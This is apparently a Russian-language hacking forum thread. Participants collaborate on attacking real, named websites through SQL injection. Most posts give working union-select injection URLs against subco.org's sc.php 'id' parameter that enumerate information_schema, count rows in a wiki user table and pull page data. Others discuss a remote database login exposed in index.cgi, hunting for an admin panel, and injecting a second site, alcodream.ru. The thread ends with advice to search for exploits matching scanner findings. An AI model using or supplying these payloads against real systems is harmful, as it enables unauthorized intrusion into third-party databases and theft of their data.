mailbrush Там, в index.cgi, есть инфа для коннекта к БД, причем возможно удаленно приконнектиться. Попробуй это проработать + поискать админку.
А тогда в 101 раз скажу - для начала вот так: Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,table_schema,10,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f75736572/* допустим выдаст нечто вроде subco_db потом так: Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13+from+subco_db.dubwiki_user/*
В той таблице нету записей http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,(select+count(*)+from+dubwiki_user),13+from+information_schema.tables--+
crawen_s http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11,12,13+from+information_schema.columns+where+table_name=0x64756277696B695F75736572+limit+1,7/* А вообще: Может быть другая DB. Как проверять написал Pashkela В данной таблице нету записей ...WHERE TABLE_NAME=<hex>
... ))) не в то поле смотрел)) Пора баиньки Вообще бред какой-то: Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_user--+ вот так должен выводить ноль, если записей нет, ошибки нет, но просто пусто, великолепно. Хз чо такое А вот с этой таблы выводит: Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_version--+ и показывает кол-во 7. У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото. Старшие придут, может чо поумнее скажут PS: Ну да, остальные dubwiki в той же БД: Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,table_schema,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f70616765--+ но из них инфо спокойно читается, на тоже как-то странно) Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+ какой-то мегохоцер БД строил
а вы как бы не предполагали что вы не туда выводите результат запроса? Просто в коде для 10-ого поля стоит проверка, если 0 то ничего не выводится вообще. А если выводить например в 12-ое поле то отлично видно что в той табличке просто ничего нет Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*),13+from+dubwiki_user--+
^ || Вот именно Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,0x30,11,12,13+--+ какие тут связи нарушены могут быть? нейронные? во что покрашена табла? в какой цвет? и собственно какая табла? в последнем примере ничего странного не обнаружил, мож ты просто в concat_ws разделитель забыл поставить?
http://www.alcodream.ru/categoryID/80+UNION+SELECT%20group_concat(table_name)%20from%20information_schema.tables%20-- Как вот сдесь сделать вывод просто если 80 заменить на 80-80 или там на 2923939 или "-" подставить скиыдывает на индекс.пхп
Наибанальнейший вопрос: Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать? Если уже где-то это было прошу скинуть ссылку на этот топик.
6@llT0 Копируеш тип уязвимости и в гугл искать сплоит или хотяби тему на форуме www.sevuritylab.ru, www.securityfocus.com, etc.
